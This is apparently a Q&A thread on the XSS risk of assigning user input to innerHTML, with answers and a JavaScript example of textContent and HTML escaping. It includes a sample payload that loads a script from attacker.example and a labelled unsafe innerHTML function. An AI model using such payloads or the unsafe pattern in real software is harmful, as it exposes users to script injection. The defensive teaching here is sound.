Let's say I have a <textarea> and a <div> element, and when the user puts HTML, CSS, or whatever they want into the textarea, their input is set as the innerHTML of the <div> element, using JavaScript.
What are the vulnerabilities of letting the user define the content of a <div> element?
asked Apr 29, 2011 at 1:56 by Web_Designer

- Are you talking about a live preview sort of thing here? – Demian Brecht, Apr 29, 2011 at 2:03
- @Demian Yes, the div would render the HTML as you type. – Web_Designer, Apr 29, 2011 at 2:07
4 Answers
If the content they enter does not leave the page, there is no more risk than them editing the DOM through Firebug or the Chrome inspector. If you take their input and then display it as is, that is a huge security risk, especially when other users are on your website.
Well, if you encode the contents so that any JavaScript in there won't execute, then it should be safe.
If you don't, a user could upload JavaScript that would execute the next time another user views that page.
I want to modify my response to take into account @Brigham's comments. Escaping only works reliably if you are dealing with the innerHTML of something like a div tag; if you are using a user-generated value as an attribute or within a script tag, then escaping/encoding won't work.
I'll refer you to the OWASP XSS guidance (that @Brigham originally brought to my attention) for more information: https://www.owasp/index.php/XSS_%28Cross_Site_Scripting%29_Prevention_Cheat_Sheet#Untrusted_Data
The user can do cross-site scripting: they can inject malicious client-side code.
Take a look at http://en.wikipedia/wiki/Cross-site_scripting
Whatever they want could include a <script> tag which pulls a .js file from their own server. Then, if you show that content to another user, the script could do all kinds of things to extract information from the unsuspecting user.
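The three patterns the answers describe, written out as an added example (not code from the question or any answer): the raw innerHTML assignment from the question, the text-only assignment that never parses the input as HTML, and the element-body encoder the second answer calls "encoding". The `attacker.example` URL and the `.preview` class are constructed for the example.

```javascript
// Encode the five characters that matter when untrusted text is placed in an
// element's body (the innerHTML-of-a-div case the second answer covers). This
// is NOT the right encoder for an unquoted attribute or the inside of a
// <script> block; those contexts need their own encoder, as that answer notes.
function escapeHtml(str) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(str).replace(/[&<>"']/g, (ch) => map[ch]);
}

// The pattern from the question: the textarea value becomes markup. The
// browser parses whatever was typed, including a <script src=...> tag.
// Harmless while it stays in the typist's own page; XSS once it is stored
// and shown to another user.
function renderUnsafe(previewDiv, userInput) {
  previewDiv.innerHTML = userInput;
}

// Safe when the goal is "show what they typed": assign text, not markup.
// The input is never parsed as HTML, so no encoder is needed at all.
function renderAsText(previewDiv, userInput) {
  previewDiv.textContent = userInput;
}

// Safe when you must build an HTML string around the input (your own tags
// plus their text): encode the untrusted part before it reaches innerHTML.
function buildPreviewMarkup(userInput) {
  return '<pre class="preview">' + escapeHtml(userInput) + '</pre>';
}

// Constructed sample input of the kind the last answer describes.
const sampleInput = '<script src="https://attacker.example/x.js"></script>';

// Only touch the DOM when one exists; under Node the functions are just
// exercised on plain objects.
if (typeof document !== 'undefined') {
  const div = document.createElement('div');
  renderAsText(div, sampleInput);            // shows the tag as literal text
  div.innerHTML = buildPreviewMarkup(sampleInput); // same, wrapped in <pre>
}
```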